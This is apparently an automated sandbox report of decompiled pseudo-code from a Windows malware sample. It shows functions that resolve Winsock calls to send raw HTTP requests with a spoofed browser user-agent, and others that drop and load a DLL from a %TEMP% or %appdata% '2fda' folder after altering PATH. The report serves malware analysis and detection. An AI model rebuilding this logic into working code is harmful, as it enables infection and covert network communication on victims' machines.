                            				}
                            				 *0x41cb38 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0xc]));
                            				 *0x41cb3c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x17]));
                            				 *0x41cb40 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x25]));
                            				 *0x41cb44 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x2c]));
                            				 *0x41cb48 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x31]));
                            				 *0x41cb4c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x36]));
                            				 *0x41cb50 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x3c]));
                            				 *0x41cb54 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x44]));
                            				if(_t196 != 0 &&  *0x41cb38 != 0 &&  *0x41cb3c != 0 &&  *0x41cb40 != 0 &&  *0x41cb44 != 0 &&  *0x41cb48 != 0 &&  *0x41cb4c != 0 &&  *0x41cb50 != 0 &&  *0x41cb54 != 0) {
                            					E004034E4( &_v24);
                            					_push( &_v432);
                            					_push(E00404F40(2, 2));
                            					if( *0x41cb38() == 0) {
                            						_t225 =  *0x41cb40(2, 1, 0);
                            						if(_t225 != 0xffffffff) {
                            							_v448 = 2;
                            							_t144 =  *0x41cb3c(E00403990(_v8));
                            							if(_t144 != 0) {
                            								_v444 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))));
                            								_v446 =  *0x41cb4c(_a8);
                            								_t151 =  *0x41cb50(_t225,  &_v448, 0x10);
                            								_t243 = _t151;
                            								if(_t151 == 0) {
                            									E00403850();
                            									E00403D88( &_v1480, _v1484);
                            									E0041745C(E00403790(_a12), _t196,  &_v1488, _t225, _t243);
                            									E00403D88( &_v1492, _a12);
                            									E00403E78();
                            									E0040377C( &_v20, _v1476);
                            									 *0x41cb44(_t225, E004039E8( &_v20), E00403790(_v20), 0, _v1492, L"\r\n\r\n", _v1488, _v1480, "Content-Length: ", 0x417cd4, "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", "User-agent: ", "Connection: close\r\n", 0x417cd4, _a16, "Host: ", " HTTP/1.0\r\n", _v12, 0x417ca4, _v16);
                            									E004034E4( &_v24);
                            									do {
                            										E004034E4( &_v32);
                            										E004028E0( &_v1472, 0x400);
                            										_t197 =  *0x41cb48(_t225,  &_v1472, 0x400, 0);
                            										E004035D4( &_v32, _t197,  &_v1472);
                            										E00403798( &_v24, _v32);
                            									} while (_t197 > 0);
                            									 *0x41cb54(_t225);
                            									_push( &_v24);
                            									_push(E00403AD4(0x417d7c, _v24) + 4);
                            									_t186 = E00403790(_v24);
                            									_pop(_t222);
                            									E004039F0(_v24, _t186, _t222);
                            									E00403538(_a4, _v24);
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_pop(_t206);
                            				 *[fs:eax] = _t206;
                            				_push(E00417C38);
                            				E00403BF4( &_v1492, 2);
                            				E004034E4( &_v1484);
                            				E00403BF4( &_v1480, 2);
                            				E00403508( &_v32, 7);
                            				return E00403508( &_a12, 2);
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000,00417C31,?,00000000,00000000,?,00418203,00000000,?,?,?), ref: 004178AC
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00417C31,?,00000000,00000000,?,00418203,00000000,?,?,?), ref: 004178C0
                            • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004178D4
                            • GetProcAddress.KERNEL32(00000000,-00000017), ref: 004178EB
                            • GetProcAddress.KERNEL32(00000000,-00000025), ref: 00417902
                            • GetProcAddress.KERNEL32(00000000,-0000002C), ref: 00417919
                            • GetProcAddress.KERNEL32(00000000,-00000031), ref: 00417930
                            • GetProcAddress.KERNEL32(00000000,-00000036), ref: 00417947
                            • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041795E
                            • GetProcAddress.KERNEL32(00000000,-00000044), ref: 00417975
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
                            • API String ID: 384173800-3355491746
                            • Opcode ID: 2e791c19a78f51646ad9b3e062a26aed4a75e7cdfad1e0aea646d3ea52340998
                            • Instruction ID: 40f87eb91c0466ae62d4265024b0cddbd223269e9b4c2b0dfc8b3cbba4f3f7f6
                            • Opcode Fuzzy Hash: 2e791c19a78f51646ad9b3e062a26aed4a75e7cdfad1e0aea646d3ea52340998
                            • Instruction Fuzzy Hash: 22B101B19042099BDB10EF65DC86ADFBBB8BB04309F10407BE505F22D1DB78AA458F98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E0040965C(intOrPtr* __eax, void* __ebx, void* __edx, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v117;
                            				void* _t18;
                            				void* _t34;
                            				intOrPtr* _t37;
                            				intOrPtr* _t42;
                            				intOrPtr* _t55;
                            				intOrPtr* _t60;
                            				intOrPtr* _t65;
                            				intOrPtr* _t70;
                            				intOrPtr* _t75;
                            				intOrPtr* _t80;
                            				intOrPtr* _t85;
                            				intOrPtr* _t90;
                            				intOrPtr* _t95;
                            				intOrPtr* _t100;
                            				intOrPtr* _t105;
                            				intOrPtr* _t110;
                            				intOrPtr* _t115;
                            				intOrPtr* _t132;
                            				intOrPtr* _t134;
                            				intOrPtr _t144;
                            				intOrPtr _t153;
                            				intOrPtr _t156;
                            
                            				 *__eax =  *__eax + __eax;
                            				_t18 = __eax +  *__eax;
                            				 *_t18 =  *_t18 + _t18;
                            				asm("das");
                            				 *_t18 =  *_t18 + _t18;
                            				_t1 =  &_v117;
                            				 *_t1 = _v117 + __edx;
                            				_t156 =  *_t1;
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(__ebx);
                            				_v8 = _t18;
                            				E00403980(_v8);
                            				_push(_t153);
                            				_push(0x409963);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t153;
                            				 *0x41b0d8 = 0;
                            				E004062FC(L"%TEMP%\\2fda\\",  &_v12, _t156);
                            				E00403C18(0x41ca5c, _v12);
                            				CreateDirectoryW(E00403D98( *0x41ca5c), 0);
                            				E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t156);
                            				_t132 =  *0x41b3c4; // 0x41c7ac
                            				E00403E14( &_v16,  *_t132,  *0x41ca5c, _t156);
                            				_t34 = E0040776C(_v16, 0x41ca58,  *_t132);
                            				_t157 = _t34;
                            				if(_t34 == 0) {
                            					E004062FC(L"%appdata%\\2fda\\",  &_v20, _t157);
                            					E00403C18(0x41ca5c, _v20);
                            					CreateDirectoryW(E00403D98( *0x41ca5c), 0);
                            					E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t157);
                            				}
                            				_t37 =  *0x41b3ac; // 0x41c6ac
                            				 *((intOrPtr*)( *_t37))(L"PATH", E00403D98( *0x41ca5c));
                            				_t42 =  *0x41b320; // 0x41c6b0
                            				 *((intOrPtr*)( *_t42))(E00403D98( *0x41ca5c));
                            				_t134 =  *0x41b3c4; // 0x41c7ac
                            				E00403E14( &_v24,  *_t134,  *0x41ca5c, _t157);
                            				 *0x41ca58 = LoadLibraryExW(E00403D98(_v24), 0, 8);
                            				if( *0x41ca58 != 0) {
                            					_t55 =  *0x41b37c; // 0x41c994
                            					 *0x41ca20 = GetProcAddress( *0x41ca58, E00403990( *_t55));
                            					_t60 =  *0x41b42c; // 0x41c998
                            					 *0x41ca24 = GetProcAddress( *0x41ca58, E00403990( *_t60));
                            					_t65 =  *0x41b14c; // 0x41c99c
                            					 *0x41ca28 = GetProcAddress( *0x41ca58, E00403990( *_t65));
                            					_t70 =  *0x41b214; // 0x41c9a0
                            					 *0x41ca2c = GetProcAddress( *0x41ca58, E00403990( *_t70));
                            					_t75 =  *0x41b418; // 0x41c9a4
                            					 *0x41ca30 = GetProcAddress( *0x41ca58, E00403990( *_t75));
                            					_t80 =  *0x41b2a4; // 0x41c9a8
                            					 *0x41ca34 = GetProcAddress( *0x41ca58, E00403990( *_t80));
                            					_t85 =  *0x41b328; // 0x41c9ac
                            					 *0x41ca38 = GetProcAddress( *0x41ca58, E00403990( *_t85));
                            					_t90 =  *0x41b318; // 0x41c7d8
                            					 *0x41ca3c = GetProcAddress( *0x41ca58, E00403990( *_t90));
                            					_t95 =  *0x41b2bc; // 0x41c7dc
                            					 *0x41ca40 = GetProcAddress( *0x41ca58, E00403990( *_t95));
                            					_t100 =  *0x41b408; // 0x41c7e0
                            					 *0x41ca44 = GetProcAddress( *0x41ca58, E00403990( *_t100));
                            					_t105 =  *0x41b3b8; // 0x41c7e4
                            					 *0x41ca48 = GetProcAddress( *0x41ca58, E00403990( *_t105));
                            					_t110 =  *0x41b2f0; // 0x41c7e8
                            					 *0x41ca4c = GetProcAddress( *0x41ca58, E00403990( *_t110));
                            					_t115 =  *0x41b48c; // 0x41c7ec
                            					 *0x41ca50 = GetProcAddress( *0x41ca58, E00403990( *_t115));
                            					if( *0x41ca20 != 0 &&  *0x41ca24 != 0 &&  *0x41ca28 != 0 &&  *0x41ca2c != 0 &&  *0x41ca30 != 0 &&  *0x41ca34 != 0 &&  *0x41ca38 != 0 &&  *0x41ca3c != 0 &&  *0x41ca40 != 0 &&  *0x41ca44 != 0 &&  *0x41ca48 != 0 &&  *0x41ca4c != 0 &&  *0x41ca50 != 0) {
                            						 *0x41b0d8 = 1;
                            					}
                            				}
                            				_pop(_t144);
                            				 *[fs:eax] = _t144;
                            				_push(E0040996A);
                            				E00403BF4( &_v24, 4);
                            				return E004034E4( &_v8);
                            			}

                            APIs
                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
                            • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                            • API String ID: 763169861-1556614757
                            • Opcode ID: 3dabca578a80f5a72b4bbe57d97a85dc37324ae0374c3875346d0a4ab4ac3a91
                            • Instruction ID: 26d77c896aabed61a2775ccb06ba61d1ee422efe4d6d96ca95dbfc380ed6e43d
                            • Opcode Fuzzy Hash: 3dabca578a80f5a72b4bbe57d97a85dc37324ae0374c3875346d0a4ab4ac3a91
                            • Instruction Fuzzy Hash: DA91D9B06402049FD712EF69D885B9A37E8BF4A349F00847AF404EB7A6C778AD44CB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E00409664(char __eax, void* __ebx, void* __edx, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v117;
                            				void* _t33;
                            				intOrPtr* _t36;
                            				intOrPtr* _t41;
                            				intOrPtr* _t54;
                            				intOrPtr* _t59;
                            				intOrPtr* _t64;
                            				intOrPtr* _t69;
                            				intOrPtr* _t74;
                            				intOrPtr* _t79;
                            				intOrPtr* _t84;
                            				intOrPtr* _t89;
                            				intOrPtr* _t94;
                            				intOrPtr* _t99;
                            				intOrPtr* _t104;
                            				intOrPtr* _t109;
                            				intOrPtr* _t114;
                            				intOrPtr* _t131;
                            				intOrPtr* _t133;
                            				intOrPtr _t143;
                            				intOrPtr _t152;
                            				intOrPtr _t153;
                            
                            				asm("das");
                            				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
                            				_t1 =  &_v117;
                            				 *_t1 = _v117 + __edx;
                            				_t153 =  *_t1;
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(__ebx);
                            				_v8 = __eax;
                            				E00403980(_v8);
                            				_push(_t152);
                            				_push(0x409963);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t152;
                            				 *0x41b0d8 = 0;
                            				E004062FC(L"%TEMP%\\2fda\\",  &_v12, _t153);
                            				E00403C18(0x41ca5c, _v12);
                            				CreateDirectoryW(E00403D98( *0x41ca5c), 0);
                            				E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t153);
                            				_t131 =  *0x41b3c4; // 0x41c7ac
                            				E00403E14( &_v16,  *_t131,  *0x41ca5c, _t153);
                            				_t33 = E0040776C(_v16, 0x41ca58,  *_t131);
                            				_t154 = _t33;
                            				if(_t33 == 0) {
                            					E004062FC(L"%appdata%\\2fda\\",  &_v20, _t154);
                            					E00403C18(0x41ca5c, _v20);
                            					CreateDirectoryW(E00403D98( *0x41ca5c), 0);
                            					E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t154);
                            				}
                            				_t36 =  *0x41b3ac; // 0x41c6ac
                            				 *((intOrPtr*)( *_t36))(L"PATH", E00403D98( *0x41ca5c));
                            				_t41 =  *0x41b320; // 0x41c6b0
                            				 *((intOrPtr*)( *_t41))(E00403D98( *0x41ca5c));
                            				_t133 =  *0x41b3c4; // 0x41c7ac
                            				E00403E14( &_v24,  *_t133,  *0x41ca5c, _t154);
                            				 *0x41ca58 = LoadLibraryExW(E00403D98(_v24), 0, 8);
                            				if( *0x41ca58 != 0) {
                            					_t54 =  *0x41b37c; // 0x41c994
                            					 *0x41ca20 = GetProcAddress( *0x41ca58, E00403990( *_t54));
                            					_t59 =  *0x41b42c; // 0x41c998
                            					 *0x41ca24 = GetProcAddress( *0x41ca58, E00403990( *_t59));
                            					_t64 =  *0x41b14c; // 0x41c99c
                            					 *0x41ca28 = GetProcAddress( *0x41ca58, E00403990( *_t64));
                            					_t69 =  *0x41b214; // 0x41c9a0
                            					 *0x41ca2c = GetProcAddress( *0x41ca58, E00403990( *_t69));
                            					_t74 =  *0x41b418; // 0x41c9a4
                            					 *0x41ca30 = GetProcAddress( *0x41ca58, E00403990( *_t74));
                            					_t79 =  *0x41b2a4; // 0x41c9a8
                            					 *0x41ca34 = GetProcAddress( *0x41ca58, E00403990( *_t79));
                            					_t84 =  *0x41b328; // 0x41c9ac
                            					 *0x41ca38 = GetProcAddress( *0x41ca58, E00403990( *_t84));
                            					_t89 =  *0x41b318; // 0x41c7d8
                            					 *0x41ca3c = GetProcAddress( *0x41ca58, E00403990( *_t89));
                            					_t94 =  *0x41b2bc; // 0x41c7dc
                            					 *0x41ca40 = GetProcAddress( *0x41ca58, E00403990( *_t94));
                            					_t99 =  *0x41b408; // 0x41c7e0
                            					 *0x41ca44 = GetProcAddress( *0x41ca58, E00403990( *_t99));
                            					_t104 =  *0x41b3b8; // 0x41c7e4
                            					 *0x41ca48 = GetProcAddress( *0x41ca58, E00403990( *_t104));
                            					_t109 =  *0x41b2f0; // 0x41c7e8
                            					 *0x41ca4c = GetProcAddress( *0x41ca58, E00403990( *_t109));
                            					_t114 =  *0x41b48c; // 0x41c7ec
                            					 *0x41ca50 = GetProcAddress( *0x41ca58, E00403990( *_t114));
                            					if( *0x41ca20 != 0 &&  *0x41ca24 != 0 &&  *0x41ca28 != 0 &&  *0x41ca2c != 0 &&  *0x41ca30 != 0 &&  *0x41ca34 != 0 &&  *0x41ca38 != 0 &&  *0x41ca3c != 0 &&  *0x41ca40 != 0 &&  *0x41ca44 != 0 &&  *0x41ca48 != 0 &&  *0x41ca4c != 0 &&  *0x41ca50 != 0) {
                            						 *0x41b0d8 = 1;
                            					}
                            				}
                            				_pop(_t143);
                            				 *[fs:eax] = _t143;
                            				_push(E0040996A);
                            				E00403BF4( &_v24, 4);
                            				return E004034E4( &_v8);
                            			}

                            Instruction addresses (the address column that accompanies the decompiled listing above, one entry per statement, in listing order): 0x00409664 0x00409665 0x00409667 0x00409667 0x00409667 0x0040966d 0x0040966e 0x0040966f 0x00409670 0x00409671 0x00409672 0x00409674 0x0040967a 0x0040968b 0x0040968c 0x00409691 0x00409694 0x00409697 0x004096a6 0x004096b0 0x004096bf 0x004096c9 0x004096ce 0x004096db 0x004096e3 0x004096e8 0x004096ea 0x004096f4 0x004096fe 0x0040970d 0x00409717 0x00409717 0x00409729 0x00409730 0x0040973a 0x00409741 0x00409747 0x00409754 0x00409767 0x0040976c 0x00409772 0x00409787 0x0040978c 0x004097a1 0x004097a6 0x004097bb 0x004097c0 0x004097d5 0x004097da 0x004097ef 0x004097f4 0x00409809 0x0040980e 0x00409823 0x00409828 0x0040983d 0x00409842 0x00409857 0x0040985c 0x00409871 0x00409876 0x0040988b 0x00409890 0x004098a5 0x004098aa 0x004098bf 0x004098cb 0x00409939 0x00409939 0x004098cb 0x00409942 0x00409945 0x00409948 0x00409955 0x00409962

                            APIs
                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
                            • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                            • API String ID: 763169861-1556614757
                            • Opcode ID: a16eaeec054c51931e14f5265a1c09e3020d9e051cf30a86899ec13f16d3cac9
                            • Instruction ID: 5b3c55801863a32800eae0c5f30943bce4d4c5d0b2659c2e20ef893ba67f7cd3
                            • Opcode Fuzzy Hash: a16eaeec054c51931e14f5265a1c09e3020d9e051cf30a86899ec13f16d3cac9
                            • Instruction Fuzzy Hash: A991E8B06402049FD711EF69D885F9A37E8BF49349F00847AB404EB7A6C778AD44CB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E00409668(char __eax, void* __ebx, void* __esi, void* __eflags) {
                            				char _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				void* _t31;
                            				intOrPtr* _t34;
                            				intOrPtr* _t39;
                            				intOrPtr* _t52;
                            				intOrPtr* _t57;
                            				intOrPtr* _t62;
                            				intOrPtr* _t67;
                            				intOrPtr* _t72;
                            				intOrPtr* _t77;
                            				intOrPtr* _t82;
                            				intOrPtr* _t87;
                            				intOrPtr* _t92;
                            				intOrPtr* _t97;
                            				intOrPtr* _t102;
                            				intOrPtr* _t107;
                            				intOrPtr* _t112;
                            				intOrPtr* _t129;
                            				intOrPtr* _t131;
                            				intOrPtr _t140;
                            				intOrPtr _t149;
                            				void* _t150;
                            
                            				_t150 = __eflags;
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(__ebx);
                            				_v8 = __eax;
                            				E00403980(_v8);
                            				_push(_t149);
                            				_push(0x409963);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t149;
                            				 *0x41b0d8 = 0;
                            				E004062FC(L"%TEMP%\\2fda\\",  &_v12, _t150);
                            				E00403C18(0x41ca5c, _v12);
                            				CreateDirectoryW(E00403D98( *0x41ca5c), 0);
                            				E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t150);
                            				_t129 =  *0x41b3c4; // 0x41c7ac
                            				E00403E14( &_v16,  *_t129,  *0x41ca5c, _t150);
                            				_t31 = E0040776C(_v16, 0x41ca58,  *_t129);
                            				_t151 = _t31;
                            				if(_t31 == 0) {
                            					E004062FC(L"%appdata%\\2fda\\",  &_v20, _t151);
                            					E00403C18(0x41ca5c, _v20);
                            					CreateDirectoryW(E00403D98( *0x41ca5c), 0);
                            					E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t151);
                            				}
                            				_t34 =  *0x41b3ac; // 0x41c6ac
                            				 *((intOrPtr*)( *_t34))(L"PATH", E00403D98( *0x41ca5c));
                            				_t39 =  *0x41b320; // 0x41c6b0
                            				 *((intOrPtr*)( *_t39))(E00403D98( *0x41ca5c));
                            				_t131 =  *0x41b3c4; // 0x41c7ac
                            				E00403E14( &_v24,  *_t131,  *0x41ca5c, _t151);
                            				 *0x41ca58 = LoadLibraryExW(E00403D98(_v24), 0, 8);
                            				if( *0x41ca58 != 0) {
                            					_t52 =  *0x41b37c; // 0x41c994
                            					 *0x41ca20 = GetProcAddress( *0x41ca58, E00403990( *_t52));
                            					_t57 =  *0x41b42c; // 0x41c998
                            					 *0x41ca24 = GetProcAddress( *0x41ca58, E00403990( *_t57));
                            					_t62 =  *0x41b14c; // 0x41c99c
                            					 *0x41ca28 = GetProcAddress( *0x41ca58, E00403990( *_t62));
                            					_t67 =  *0x41b214; // 0x41c9a0
                            					 *0x41ca2c = GetProcAddress( *0x41ca58, E00403990( *_t67));
                            					_t72 =  *0x41b418; // 0x41c9a4
                            					 *0x41ca30 = GetProcAddress( *0x41ca58, E00403990( *_t72));
                            					_t77 =  *0x41b2a4; // 0x41c9a8
                            					 *0x41ca34 = GetProcAddress( *0x41ca58, E00403990( *_t77));
                            					_t82 =  *0x41b328; // 0x41c9ac
                            					 *0x41ca38 = GetProcAddress( *0x41ca58, E00403990( *_t82));
                            					_t87 =  *0x41b318; // 0x41c7d8
                            					 *0x41ca3c = GetProcAddress( *0x41ca58, E00403990( *_t87));
                            					_t92 =  *0x41b2bc; // 0x41c7dc
                            					 *0x41ca40 = GetProcAddress( *0x41ca58, E00403990( *_t92));
                            					_t97 =  *0x41b408; // 0x41c7e0
                            					 *0x41ca44 = GetProcAddress( *0x41ca58, E00403990( *_t97));
                            					_t102 =  *0x41b3b8; // 0x41c7e4
                            					 *0x41ca48 = GetProcAddress( *0x41ca58, E00403990( *_t102));
                            					_t107 =  *0x41b2f0; // 0x41c7e8
                            					 *0x41ca4c = GetProcAddress( *0x41ca58, E00403990( *_t107));
                            					_t112 =  *0x41b48c; // 0x41c7ec
                            					 *0x41ca50 = GetProcAddress( *0x41ca58, E00403990( *_t112));
                            					if( *0x41ca20 != 0 &&  *0x41ca24 != 0 &&  *0x41ca28 != 0 &&  *0x41ca2c != 0 &&  *0x41ca30 != 0 &&  *0x41ca34 != 0 &&  *0x41ca38 != 0 &&  *0x41ca3c != 0 &&  *0x41ca40 != 0 &&  *0x41ca44 != 0 &&  *0x41ca48 != 0 &&  *0x41ca4c != 0 &&  *0x41ca50 != 0) {
                            						 *0x41b0d8 = 1;
                            					}
                            				}
                            				_pop(_t140);
                            				 *[fs:eax] = _t140;
                            				_push(E0040996A);
                            				E00403BF4( &_v24, 4);
                            				return E004034E4( &_v8);
                            			}

                            Instruction addresses (the address column that accompanies the decompiled listing above, one entry per statement, in listing order): 0x00409668 0x0040966d 0x0040966e 0x0040966f 0x00409670 0x00409671 0x00409672 0x00409674 0x0040967a 0x0040968b 0x0040968c 0x00409691 0x00409694 0x00409697 0x004096a6 0x004096b0 0x004096bf 0x004096c9 0x004096ce 0x004096db 0x004096e3 0x004096e8 0x004096ea 0x004096f4 0x004096fe 0x0040970d 0x00409717 0x00409717 0x00409729 0x00409730 0x0040973a 0x00409741 0x00409747 0x00409754 0x00409767 0x0040976c 0x00409772 0x00409787 0x0040978c 0x004097a1 0x004097a6 0x004097bb 0x004097c0 0x004097d5 0x004097da 0x004097ef 0x004097f4 0x00409809 0x0040980e 0x00409823 0x00409828 0x0040983d 0x00409842 0x00409857 0x0040985c 0x00409871 0x00409876 0x0040988b 0x00409890 0x004098a5 0x004098aa 0x004098bf 0x004098cb 0x00409939 0x00409939 0x004098cb 0x00409942 0x00409945 0x00409948 0x00409955 0x00409962

                            APIs
                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressProc$CreateDirectory$AllocLibraryLoadString
                            • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                            • API String ID: 763169861-1556614757
                            • Opcode ID: ce2ff15e378b2bb7b4fef2ac6f55289aba182e4e6d2a742e5fc03b537afcb1c4
                            • Instruction ID: 26c99af69019636de113f168175dae5416f6f3cc59ad43c6f3cb6d4c520b39b5
                            • Opcode Fuzzy Hash: ce2ff15e378b2bb7b4fef2ac6f55289aba182e4e6d2a742e5fc03b537afcb1c4
                            • Instruction Fuzzy Hash: A191D7B06402049FD711EF69D885F9A77E8BF49349F00847AB404EB7A6C778AD44CB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 44%
                            			E00416974(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
                            				char _v8;
                            				char _v12;
                            				intOrPtr _v16;
                            				char _v20;
                            				intOrPtr _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				intOrPtr _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				char _v92;
                            				char _v96;
                            				char _v100;
                            				signed char _t59;
                            				intOrPtr* _t60;
                            				intOrPtr* _t142;
                            				void* _t143;
                            				intOrPtr _t173;
                            				void* _t181;
                            				intOrPtr _t184;
                            				intOrPtr _t185;
                            
                            				_t182 = __esi;
                            				_t59 = __eax +  *__eax;
